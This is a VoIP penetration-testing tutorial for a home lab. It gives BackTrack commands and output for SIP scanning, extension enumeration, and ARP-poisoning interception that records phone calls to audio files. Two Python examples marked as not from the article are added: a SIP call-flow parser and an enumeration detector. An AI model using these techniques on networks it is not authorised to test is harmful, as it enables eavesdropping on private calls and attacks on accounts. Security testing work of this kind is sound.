SIP usually uses port 5060 TCP or UDP for unencrypted signaling, or 5061 for encrypted transport using TLS.
SIP is an ASCII-based protocol which has some elements similar to the HTTP protocol, using a request/response model. Much like an HTTP request from a browser, a SIP client request is made using a SIP URI, a user agent and a method/request. SIP uses an e-mail-like address format: user/phone@domain/ip. A typical SIP URI looks like:
sip:205@192.168.1.100, sip:username@pbx.com , sip:205@192.168.1.100:5060
Depending on the request made by the client, a response is returned with a status or error code. The following tables describe the available requests and responses in the SIP protocol.
SIP Responses
Response  Description
1xx       Informational responses: request received and being processed.
2xx       Successful responses: the action was successfully received, understood, and accepted.
3xx       Redirection responses.
4xx       Request failure responses: the request contains bad syntax or cannot be fulfilled at the server.
5xx       Server failure responses: the server failed to fulfill an apparently valid request.
6xx       Global failure responses: the request cannot be fulfilled at any server.
SIP/2.0 100 Trying
Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060
From: "NIghtRanger" ;tag=eihgg
To:
Call-ID: hfxsabthoymshub@backtrack
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Contact:
Content-Length: 0
The calling phone sends an INVITE. The called phone sends back a response of 100 (Trying). The called phone then starts to ring and sends a response of 180 (Ringing). When the call is answered, the called phone sends a response of 200 (OK) and the calling phone acknowledges it with an ACK. The conversation then flows via RTP. When one party hangs up, its phone sends a BYE request and the other side responds with 200 (OK).
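To make the message format and the call flow above concrete, here is an added example (not from the article) that parses SIP messages like the 100 Trying shown earlier and replays the INVITE dialog as a state machine, rejecting messages that do not fit the flow or belong to another Call-ID. The sample messages are constructed; the From/To URIs and the helper names are placeholders, not values from the article.

```python
from typing import Dict, List, Optional

# SIP response classes, as in the response table above.
RESPONSE_CLASSES = {
    1: "Informational", 2: "Success", 3: "Redirection",
    4: "Request failure", 5: "Server failure", 6: "Global failure",
}


class SipMessage:
    def __init__(self, start_line: str, headers: Dict[str, str], body: str):
        self.start_line, self.headers, self.body = start_line, headers, body
        parts = start_line.split(" ", 2)
        if parts[0].startswith("SIP/"):      # status line: "SIP/2.0 100 Trying"
            self.is_response = True
            self.status: Optional[int] = int(parts[1])
            self.method: Optional[str] = None
        else:                                # request line: "INVITE sip:... SIP/2.0"
            self.is_response = False
            self.status = None
            self.method = parts[0]

    @property
    def cseq_method(self) -> str:
        """Method named in CSeq; it ties a response to the request it answers."""
        fields = self.headers.get("cseq", "").split()
        return fields[-1] if fields else ""


def parse_sip_message(raw: str) -> SipMessage:
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return SipMessage(lines[0], headers, body)


def response_class(status: int) -> str:
    return RESPONSE_CLASSES.get(status // 100, "Unknown")


# Dialog transitions (state, event) -> next state. The event is the request
# method, or "<status>/<CSeq method>" for a response.
TRANSITIONS = {
    ("idle", "INVITE"): "inviting",
    ("inviting", "100/INVITE"): "trying",
    ("inviting", "180/INVITE"): "ringing",
    ("trying", "180/INVITE"): "ringing",
    ("trying", "200/INVITE"): "answered",
    ("ringing", "200/INVITE"): "answered",
    ("answered", "ACK"): "established",
    ("established", "BYE"): "terminating",
    ("terminating", "200/BYE"): "terminated",
}


def track_dialog(messages: List[str]) -> List[str]:
    """Replay the messages of one Call-ID and return the states visited.
    Raises ValueError on a foreign Call-ID or a message the flow does not allow,
    which is what a SIP-aware monitor would flag as anomalous signaling."""
    state, call_id, visited = "idle", None, ["idle"]
    for raw in messages:
        msg = parse_sip_message(raw)
        cid = msg.headers.get("call-id")
        if call_id is None:
            call_id = cid
        elif cid != call_id:
            raise ValueError(f"Call-ID {cid!r} does not belong to dialog {call_id!r}")
        event = f"{msg.status}/{msg.cseq_method}" if msg.is_response else msg.method
        nxt = TRANSITIONS.get((state, event))
        if nxt is None:
            raise ValueError(f"unexpected {event} in state {state}")
        state = nxt
        visited.append(state)
    return visited


def is_valid_dialog(messages: List[str]) -> bool:
    """True only for a dialog that follows the flow and is torn down with BYE/200."""
    try:
        return track_dialog(messages)[-1] == "terminated"
    except ValueError:
        return False


def build_message(start: str, cseq: str, call_id: str = "hfxsabthoymshub@backtrack") -> str:
    # Constructed minimal messages; From/To URIs are placeholders for this example.
    return (f"{start}\r\nVia: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka\r\n"
            f"From: <sip:201@192.168.1.104>;tag=eihgg\r\nTo: <sip:200@192.168.1.104>\r\n"
            f"Call-ID: {call_id}\r\nCSeq: {cseq}\r\nContent-Length: 0\r\n\r\n")


# The flow from the text: INVITE, 100 Trying, 180 Ringing, 200 OK, ACK, BYE, 200 OK.
SAMPLE_CALL = [
    build_message("INVITE sip:200@192.168.1.104 SIP/2.0", "650 INVITE"),
    build_message("SIP/2.0 100 Trying", "650 INVITE"),
    build_message("SIP/2.0 180 Ringing", "650 INVITE"),
    build_message("SIP/2.0 200 OK", "650 INVITE"),
    build_message("ACK sip:200@192.168.1.104 SIP/2.0", "650 ACK"),
    build_message("BYE sip:201@192.168.1.102 SIP/2.0", "651 BYE"),
    build_message("SIP/2.0 200 OK", "651 BYE"),
]

if __name__ == "__main__":
    print(track_dialog(SAMPLE_CALL))
```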
Attack Vectors
Before we get started with the tools, let's have a look at some common VoIP attack vectors:
Information gathering, footprinting and enumeration.
Monitoring traffic and eavesdropping on phone calls.
Attacking authentication.
VLAN hopping.
Denial of service / flooding.
Spoofing caller ID.
In order to test the tools I have set up a Trixbox PBX system and created 6 extensions. I will be using two soft phones: a Linux-based client called Twinkle and a Windows-based client called X-Lite. I will be using the latest and greatest release of BackTrack Linux, which is R2. You can find most of the VoIP attack tools in BackTrack under the /pentest/voip/ directory:
root@bt:~# cd /pentest/voip/
root@bt:/pentest/voip#
Or you can simply navigate using the KDE menu to the Backtrack -> Voice Over IP sub-menus:
Information Gathering
This phase is where we gather information about the topology, servers and clients, learning as much as we can in order to launch a successful attack. What we are interested in finding is live hosts, PBX type and version, VoIP servers/gateways, client (hardware and software) types and versions, etc. Instead of enumerating usernames we will be enumerating SIP extensions. Let's take a look at some of the tools available in BackTrack to help us find, identify and enumerate VoIP-enabled devices.
SMAP
BackTrack includes a great tool called SMAP, a simple scanner for SIP-enabled devices. SMAP sends off various SIP requests and awaits responses from SIP-enabled DSL routers, proxies and user agents. It could be considered a mash-up of NMAP and sipsak.
SMAP Usage:
usage: smap [ Options ]
-h: this help
-d: increase debugging
-o: enable fingerprinting
-O: enable more verbose fingerprinting
-l: fingerprint learning mode
-t: TCP transport
-u: UDP transport (default)
-P0: Treat all hosts as online - skip host discovery
-p : destination port
-r : messages per second rate limit
-D : SIP domain to use without leading sip:
-w : timeout in msec
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
----EDIT---
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled
256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)
Now that we have identified SIP-enabled hosts, we can use SMAP to fingerprint the server/client type and version:
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579
User-Agent: Asterisk PBX
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
In case SMAP could not fingerprint our host, we can use the -l argument to put it in learning mode, which provides some useful information:
NOTICE: test_accept: "Accept: application/sdp"
NOTICE: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY"
NOTICE: test_supported: "Supported: replaces"
NOTICE: test_via: transport capitalization: 2
NOTICE: test_via: "branch;alias;received;rport"
NOTICE: test_via: Please add new cmpstr
NOTICE: test_via: transport capitalization: 2
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579
FINGERPRINT information:
newmethod=501
accept_class=2
allow_class=201
supported_class=8
via_class=2
hoe_class=ignore
options=200
brokenfromto=404
prack=481
ping=501
invite=200
User-Agent: Asterisk PBX
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
Another useful feature of SMAP is the -d argument, which enables debug output for verbosity; try using -o along with it to view the fingerprinting process in detail.
DEBUG: local IP: 212.235.66.182
DEBUG: local IP: 212.235.66.182
DEBUG: bind() successful
DEBUG: RAW socket open
DEBUG: moving 1 from S_START to S_PING
DEBUG: ICMP error Echo Reply
DEBUG: 192.168.1.104/1 request: SIP OPTIONS request (valid)
DEBUG: response belongs to task 1 (192.168.1.104)
DEBUG: ACK:
ACK sip:localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060
From: ;tag=6b9ae50e67345d3b
To: ;tag=as14262fec
Call-ID: 1992951560@212.235.66.182
CSeq: 23915 ACK
Content-Length: 0
User-Agent: smap 0.6.0
--- end of ACK ---
192.168.1.104: ICMP reachable, SIP enabled
DEBUG: destroying task 1
SIPSAK
SIPSAK is used for testing SIP-enabled applications and devices using the OPTIONS request method only. We can use it for fingerprinting and enumeration. You won't find sipsak in the /pentest/voip/ directory; you can execute it from any location by simply typing sipsak.
root@bt:~# sipsak
sipsak 0.9.6 by Nils Ohlmeier
Copyright (C) 2002-2004 FhG Fokus
Copyright (C) 2004-2005 Nils Ohlmeier
report bugs to nils@sipsak.org

shoot  : sipsak [-f FILE] [-L] -s SIPURI
trace  : sipsak -T -s SIPURI
usrloc : sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] [-x NUMBER] [-z NUMBER] -s SIPURI
usrloc : sipsak -I|M [-b NUMBER] [-e NUMBER] -s SIPURI
usrloc : sipsak -U [-C SIPURI] [-x NUMBER] -s SIPURI
message: sipsak -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI
flood  : sipsak -F [-e NUMBER] -s SIPURI
random : sipsak -R [-t NUMBER] -s SIPURI

additional parameter in every mode:
[-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [-n] [-N] [-r PORT] [-v] [-V] [-w]

-h            displays this help message
-V            prints version string only
-f FILE       the file which contains the SIP message to send (- for standard input)
-L            de-activate CR (\r) insertion in files
-s SIPURI     the destination server uri in form sip:[user@]servername[:port]
-T            activates the traceroute mode
-U            activates the usrloc mode
-I            simulates a successful calls with itself
-M            sends messages to itself
-C SIPURI     use the given uri as Contact in REGISTER
-b NUMBER     the starting number appendix to the user name (default: 0)
-e NUMBER     the ending numer of the appendix to the user name
-o NUMBER     sleep number ms before sending next request
-x NUMBER     the expires header field value (default: 15)
-z NUMBER     activates randomly removing of user bindings
-F            activates the flood mode
-R            activates the random modues (dangerous)
-t NUMBER     the maximum number of trashed character in random mode (default: request length)
-l PORT       the local port to use (default: any)
-r PORT       the remote port to use (default: 5060)
-p HOSTNAME   request target (outbound proxy)
-H HOSTNAME   overwrites the local hostname in all headers
-m NUMBER     the value for the max-forwards header field
-n            use FQDN instead of IPs in the Via-Line
-i            deactivate the insertion of a Via-Line
-a PASSWORD   password for authentication (if omitted password="")
-u STRING     Authentication username
-d            ignore redirects
-v            each v produces more verbosity (max. 3)
-w            extract IP from the warning in reply
-g STRING     replacement for a special mark in the message
-G            activates replacement of variables
-N            returns exit codes Nagios compliant
-q STRING     search for a RegExp in replies and return error on failure
-W NUMBER     return Nagios warning if retrans > number
-B STRING     send a message with string as body
-O STRING     Content-Disposition value
-P NUMBER     Number of processes to start
-A NUMBER     number of test runs and print just timings
-S            use same port for receiving and sending
-c SIPURI     use the given uri as From in MESSAGE
-D NUMBER     timeout multiplier for INVITE transactions and reliable transports (default: 64)
-E STRING     specify transport to be used
-j STRING     adds additional headers to the request
Here is an example of using sipsak to fingerprint a SIP-enabled device. We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway.
root@bt:~# sipsak -vv -s sip:192.168.1.221
message received:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias
From: sip:sipsak@127.0.1.1:51601;tag=97ac9e5
To: sip:192.168.1.221;tag=1c1785761661
Call-ID: 159042021@127.0.1.1
CSeq: 1 OPTIONS
Contact:
Supported: em,100rel,timer,replaces,path,resource-priority
Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE
Server: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005
X-Resources: telchs=4/0;mediachs=0/0
Accept: application/sdp, application/simple-message-summary, message/sipfrag
Content-Type: application/sdp
Content-Length: 343

v=0
o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221
s=Phone-Call
c=IN IP4 192.168.1.221
t=0 0
m=audio 6000 RTP/AVP 18 8 0 127
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:127 telephone-event/8000
a=fmtp:127 0-15
a=ptime:20
a=sendrecv
a=rtcp:6001 IN IP4 192.168.1.221
SIPScan
Sip-scan is a simple scanner for SIP-enabled hosts; it can scan a single host or an entire subnet.
Sip-scan usage:
root@bt:/pentest/voip/sipscan# ./sip-scan --help
./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05), running under Perl version 5.10.0.
Usage: sip-scan [options]
-v       Be verbose.
-i       Interface/IP for SIP-headers (default: IP from ppp0)
-p       remote port to scan. (default: 5060)
-l       local origin of packets. (default: 5060)
-w n     Wait n ms after each sent packet (default: 50ms)
-d 'p'   or if given, send n packets per second (default: 20)
Scanning a subnet:
root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254
192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27
192.168.1.219: "Exelmind Call-Control Switch (CCS)"
192.168.1.248: MailVision HostLynx/2.1 'GA'
SVMAP
SVMAP is part of a suite of tools called SIPVicious and it is my favorite scanner of choice. It can be used to scan, identify and fingerprint a single IP or a range of IP addresses. Svmap allows specifying the request method used for scanning (the default method is OPTIONS), it offers debug and verbosity options, and it even allows scanning the SRV records for SIP on the destination domain. You can use ./svmap.py -h to view all the available arguments:
root@bt:/pentest/voip/sipvicious# ./svmap.py
Usage: svmap.py [options] host1 host2 hostrange
examples:
svmap.py 10.0.0.1-10.0.0.255 \
> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \
> 1.1.1.1-20 1.1.2-20.* 4.1.*.*
svmap.py -s session1 --randomize 10.0.0.1/8
svmap.py --resume session1 -v
svmap.py -p5060-5062 10.0.0.3-20 -m INVITE
Scanning an IP range:
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254
| SIP Device         | User Agent    | Fingerprint |
----------------------------------------------------
| 192.168.1.104:5060 | Asterisk PBX  | disabled    |
| 192.168.1.103:5060 | Twinkle/1.4.2 | disabled    |
Extensions Enumeration
Extension enumeration can aid an attacker by finding valid extensions on a VoIP system, which can later lead to a brute-force attack on the SIP accounts. Extension enumeration works by examining the errors returned to SIP request methods like REGISTER, OPTIONS and INVITE.
Svwar
Svwar is also a tool from the SIPVicious suite; it enumerates extensions using either a range of extensions or a dictionary file. Svwar supports all three of the extension enumeration methods mentioned above; the default method for enumeration is REGISTER. Usage:
root@bt:/pentest/voip/sipvicious# ./svwar.py
Usage: svwar.py [options] target
examples:
svwar.py -e100-999 10.0.0.1
svwar.py -d dictionary.txt 10.0.0.2
Example:
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 203       | reqauth        |
| 202       | reqauth        |
| 303       | reqauth        |
| 305       | reqauth        |
Svwar has identified all the extensions I've created on my Trixbox server. You can specify another SIP method by using the -m argument; you can also add -t, -v or -vv for verbosity.
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -v
INFO:TakeASip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:TakeASip:Ok SIP device found
INFO:TakeASip:extension '200' exists - requires authentication
INFO:TakeASip:extension '201' exists - requires authentication
-----Edit---
INFO:TakeASip:extension '203' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '305' exists - requires authentication
INFO:root:we have 6 extensions
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 203       | reqauth        |
| 202       | reqauth        |
| 303       | reqauth        |
| 305       | reqauth        |
INFO:root:Total time: 0:00:21.944731
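From the PBX side, an svwar run like the one above leaves a burst of registration failures from one address against many different extensions. The following added example (not from the article or from SIPVicious) flags that pattern in Asterisk-style chan_sip log lines; the log lines are constructed for this example, and the threshold and window are assumed values to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Tuple

# Constructed Asterisk-style chan_sip log lines (not real captures): one address
# walks extensions 100..105 and 200 within seconds, a second address fails once.
SAMPLE_LOG = """\
[Feb  5 13:04:18] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.168.1.104>' failed for '192.168.1.50:5060' - No matching peer found
[Feb  5 13:04:18] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.168.1.104>' failed for '192.168.1.50:5060' - No matching peer found
[Feb  5 13:04:19] NOTICE[2231] chan_sip.c: Registration from '"102" <sip:102@192.168.1.104>' failed for '192.168.1.50:5060' - No matching peer found
[Feb  5 13:04:19] NOTICE[2231] chan_sip.c: Registration from '"103" <sip:103@192.168.1.104>' failed for '192.168.1.50:5060' - No matching peer found
[Feb  5 13:04:20] NOTICE[2231] chan_sip.c: Registration from '"104" <sip:104@192.168.1.104>' failed for '192.168.1.50:5060' - No matching peer found
[Feb  5 13:04:20] NOTICE[2231] chan_sip.c: Registration from '"105" <sip:105@192.168.1.104>' failed for '192.168.1.50:5060' - No matching peer found
[Feb  5 13:04:21] NOTICE[2231] chan_sip.c: Registration from '"200" <sip:200@192.168.1.104>' failed for '192.168.1.50:5060' - Wrong password
[Feb  5 13:05:02] NOTICE[2231] chan_sip.c: Registration from '"201" <sip:201@192.168.1.104>' failed for '192.168.1.118:5060' - Wrong password
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)\] NOTICE\[\d+\] chan_sip\.c: "
    r"Registration from '.*?<sip:(?P<ext>[^@>]+)@[^>]*>' failed for "
    r"'(?P<src>[\d.]+)(?::\d+)?' - (?P<reason>.+)$"
)


class Failure(NamedTuple):
    ts: datetime
    src: str
    ext: str
    reason: str


class Alert(NamedTuple):
    src: str
    extensions: Tuple[str, ...]
    reasons: Tuple[str, ...]
    start: datetime
    end: datetime


def parse_failures(log: str, year: int = 2011) -> List[Failure]:
    out: List[Failure] = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog-style stamps carry no year, so one is supplied
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
            out.append(Failure(ts, m["src"], m["ext"], m["reason"]))
    return out


def detect_enumeration(log: str, threshold: int = 5,
                       window: timedelta = timedelta(seconds=60)) -> List[Alert]:
    """One alert per source that fails against >= threshold distinct extensions
    inside any window. Both 'No matching peer found' and 'Wrong password' count:
    the differing replies are what let a scanner tell valid extensions from
    invalid ones, so both belong in the tally."""
    by_src: Dict[str, List[Failure]] = defaultdict(list)
    for f in parse_failures(log):
        by_src[f.src].append(f)
    alerts: List[Alert] = []
    for src, events in by_src.items():
        events.sort(key=lambda f: f.ts)
        for i, first in enumerate(events):
            span = [f for f in events[i:] if f.ts - first.ts <= window]
            exts = sorted({f.ext for f in span})
            if len(exts) >= threshold:
                alerts.append(Alert(src, tuple(exts), tuple(sorted({f.reason for f in span})),
                                    first.ts, span[-1].ts))
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in detect_enumeration(SAMPLE_LOG):
        print(f"{a.src}: {len(a.extensions)} extensions in {(a.end - a.start).seconds}s, "
              f"replies seen: {', '.join(a.reasons)}")
```

Asterisk's alwaysauthreject option makes the two replies indistinguishable to the scanner, but the failure burst still shows up in the log, which is why the detector counts distinct extensions rather than reasons.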
Enumiax
Enumiax is used to enumerate Asterisk Exchange (IAX) protocol usernames. It allows for a dictionary attack or sequential username guessing.
root@bt:/pentest/voip/enumiax# ./enumiax
enumIAX 1.0
Dustin D. Trammell
Usage: enumiax [options] target
options:
  -d    Dictionary attack using file
  -i    Interval for auto-save (# of operations, default 1000)
  -m #  Minimum username length (in characters)
  -M #  Maximum username length (in characters)
  -r #  Rate-limit calls (in microseconds)
  -s    Read session state from state file
  -v    Increase verbosity (repeat for additional verbosity)
  -V    Print version information and exit
  -h    Print help/usage information and exit
root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:04:18 2011
Now working on 3 character usernames...
#################################
Trying username: "000"
#################################
Trying username: "001"
#################################
Trying username: "002"
#################################
Trying username: "003"
#################################
Trying username: "004"
#################################
Trying username: "005"
#################################
Trying username: "006"
#################################
Trying username: "007"
#################################
Trying username: "008"
#################################
...
root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:02:39 2011
#################################
Trying username: "guest"
#################################
Trying username: "iaxtel"
#################################
Trying username: "iaxtel2"
#################################
Trying username: "100"
#################################
Trying username: "101"
#################################
Trying username: "200"
#################################
Trying username: "201"
#################################
Trying username: "202"
#################################
Trying username: "203"
End of dictionary file reached, exiting.
Capturing SIP authentication (we will discuss this topic later in the attacking authentication section).
Eavesdropping on users' phone calls.
For demonstration purposes we will use the following scenario:
For this attack vector we will need to perform a Man in The Middle Attack which will require the following steps:
just invoke it from anywhere by typing arpspoof. Before we can use arpspoof we will need to enable IP forwarding:
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
We will let our Arp poisoning run in the background while performing a capture using Wireshark.
Now let's start capturing some traffic. While we were sniffing, user B launched the X-Lite soft phone on his desktop computer and dialed user A's extension, 200.
Wireshark has captured some traffic, after a while I have stopped the capture process and saved the sessions into a file called sip.pcap.
We can see that we have captured the SIP traffic but for this section we are more interested in the RTP traffic because it contains the actual conversation data.
Wireshark has a pretty cool feature to decode captured VoIP call data into a playable audio format. You can find this feature under the Statistics -> VoIP Calls menu.
VoIPong
VoIPong is a utility which detects all Voice over IP calls on a pipeline and, for those which are G.711 encoded, dumps the actual conversation to separate wave files. It supports SIP, H.323, Cisco's Skinny Client Protocol, RTP and RTCP. VoIPong is located in the BackTrack /pentest/voip/voipong directory. Before we can use VoIPong we will need to make some changes to the voipong.conf file:
root@bt:/pentest/voip/voipong# nano etc/voipong.conf
soxpath = /usr/bin/sox
networksfile = /pentest/voip/voipong/etc/voipongnets
outdir = /pentest/voip/voipong/output/
device = eth0 # your network interface card name
Once VoIPong detects a phone call it will start capturing it; once the call finishes, VoIPong will stop the capture process and render it to a playable wave file. All conversations will be saved into the /pentest/voip/voipong/output folder.
Vomit
Vomit converts a Cisco IP phone RTP conversation into a wave file that can be played with ordinary sound players. Vomit requires a tcpdump output file. In order to get vomit up and running we will need to download and install waveplay. Get it here: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html
root@bt:~# tar -xzvf waveplay-20010924.tar.gz
waveplay-20010924/
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root@bt:~# cd waveplay-20010924
root@bt:~/waveplay-20010924# make
cc -c -o waveplay.o waveplay.c
cc waveplay.o -o waveplay
root@bt:~/waveplay-20010924# cp waveplay /usr/bin/
root@bt:/pentest/voip/vomit# ./vomit -r sip.dump | waveplay -S8000 -B16 -C1
UCsniff
UCSniff is a VoIP and IP video security assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP video owners and security professionals to rapidly test for the threat of unauthorized VoIP and video eavesdropping. UCSniff supports ARP poisoning, VLAN hopping and VLAN discovery via CDP, it has sniffer capabilities and more; I consider it an all-in-one eavesdropping tool. Let's take a look at some usage examples. UCSniff can operate in 2 modes:
Monitor mode: should be used on shared media where the IP phones are connected, e.g. a hub or a wireless access point; it can also be used in a switched environment by setting up a SPAN session on a Cisco switch.
Man-in-the-middle mode: this mode has 2 additional sub-modes:
Learning mode
Targeted mode
Preparing UCSniff so we can run it from any location in BackTrack:
root@bt:/tmp# cd /pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff# ./configure
root@bt:/pentest/voip/ucsniff# make
root@bt:/pentest/voip/ucsniff# make install
root@bt:/tmp/ucsniff# ucsniff -i eth0 -M
UCSniff 2.1 starting
Running in Monitor Mode
File directory-users.txt can't be opened for reading in working directory
File targets.txt can't be opened for reading in working directory
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Starting Unified sniffing...
Warning: Please ensure that you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.
SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)
SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '200Calling-201-5:2:7-3-both.wav'
SIP Call ended. Conversation recorded in file '200Calling-201-5:2:8-2-both.wav'
Closing text interface...
Unified sniffing was stopped.
We can stop the session by pressing the Q key. Several files were created by UCSniff:
Log files: detailed information about SIP transactions.
Pcap files: capture files which can be viewed in Wireshark.
Audio (wav) files: the conversation audio.
root@bt:/tmp/ucsniff# ls -l
total 376
-rw-r--r-- 1 root root  40854 5 05:02 200Calling-201-5:2:7-3-both.wav
-rw-r--r-- 1 root root 115818 5 05:02 200Calling-201-5:2:7-3.pcap
-rw-r--r-- 1 root root  46294 5 05:02 200Calling-201-5:2:8-2-both.wav
-rw-r--r-- 1 root root 103940 5 05:02 200Calling-201-5:2:8-2.pcap
-rw-r--r-- 1 root root    278 5 05:02 call_detail_log
-rw-r--r-- 1 root root    317 5 05:02 call_log
-rw-r--r-- 1 root root  10063 5 05:02 sip.log
-rw-r--r-- 1 root root  39073 5 05:02 sipdump.pcap
-rw-r--r-- 1 root root      0 5 05:01 skinny_log
root@bt:/tmp/ucsniff# ucsniff -i eth0 // //
UCSniff 2.1 starting
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:
Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name:
SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '201Calling-200-5:13:4-2-both.wav'
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
If we take a look at UCSniff log files we can see the discovered targets used in the attack.
manually to the targets.txt file in the following format:
x.x.x.x,extension,,sip
192.168.1.118,201,,sip
Or use learning mode to auto-discover hosts.
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
File targets.txt can't be opened for reading in working directory
No targets have been previously discovered in Targets file, targets.txt
Please run UCSniff in learning mode, or manually edit targets.txt
Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode:
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
Parsed 2 entries in Targets file, targets.txt
UCSniff running in target mode.
Parsed 2 previously discovered targets
Please select a Targeted Eavesdropping Mode:
1. User
Description: Eavesdrop on all calls to or from a particular endpoint.
2. Conversation
Description: Eavesdrop on bi-directional conversation flows between two selected endpoints.
Please select option (1) or (2):
Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network.
In "Conversation", two endpoints are selected and the network is ARP Poisoned to only intercept the traffic between those two users.
UCSniff includes more useful tools and attacks modes like VLAN hopping (using ACE) which will be discussed later.
Xplico
